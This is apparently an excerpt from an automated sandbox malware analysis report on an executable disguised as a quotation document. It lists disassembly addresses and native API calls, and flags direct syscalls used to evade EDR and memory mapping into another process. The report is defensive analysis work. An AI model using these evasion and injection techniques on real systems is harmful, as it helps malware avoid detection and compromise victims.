Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]	1_2_0386E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]	1_2_038EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]	1_2_0382645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]	1_2_0385245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]	1_2_038BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]	1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]	1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]	1_2_0385A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]	1_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]	1_2_03840BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_038E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]	1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]	1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]	1_2_03850BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]	1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]	1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]	1_2_03830BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_038DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]	1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]	1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]	1_2_03838BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]	1_2_0385EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_038BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]	1_2_03904B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]	1_2_038AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]	1_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]	1_2_0385EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]	1_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]	1_2_038F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]	1_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]	1_2_038E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]	1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]	1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]	1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]	1_2_03902B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]	1_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]	1_2_038C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]	1_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]	1_2_038D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]	1_2_03828B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]	1_2_038DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]	1_2_0382CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]	1_2_03904A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]	1_2_03868A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]	1_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]	1_2_03838AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]	1_2_03886AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]	1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]	1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]	1_2_03886ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]	1_2_03830AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]	1_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]	1_2_03864AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]	1_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]	1_2_0386AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]	1_2_038BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]	1_2_0386CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]	1_2_0385EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]	1_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]	1_2_03854A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]	1_2_03836A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]	1_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]	1_2_03840A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]	1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]	1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]	1_2_0386CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]	1_2_038DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]	1_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]	1_2_038ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]	1_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]	1_2_038309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]	1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]	1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]	1_2_038B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]	1_2_038C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0383A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]	1_2_038649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_038FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_038BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]	1_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]	1_2_038629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]	1_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]	1_2_038AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]	1_2_038BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]	1_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]	1_2_03828918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]	1_2_038B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]	1_2_038C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]	1_2_038B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]	1_2_03904940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]	1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]	1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]	1_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]	1_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]	1_2_038D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]	1_2_038BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]	1_2_03830887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]	1_2_038BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]	1_2_0385E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]	1_2_039008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]	1_2_038FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]	1_2_0386C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]	1_2_038BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]	1_2_03852835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]	1_2_03852835

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe

Code function: 0_2_009681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_009681F7

Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0093A395
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe	Code function: 0_2_0093A364 SetUnhandledExceptionFilter,		0_2_0093A364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtOpenKeyEx: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtQueryValueKey: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

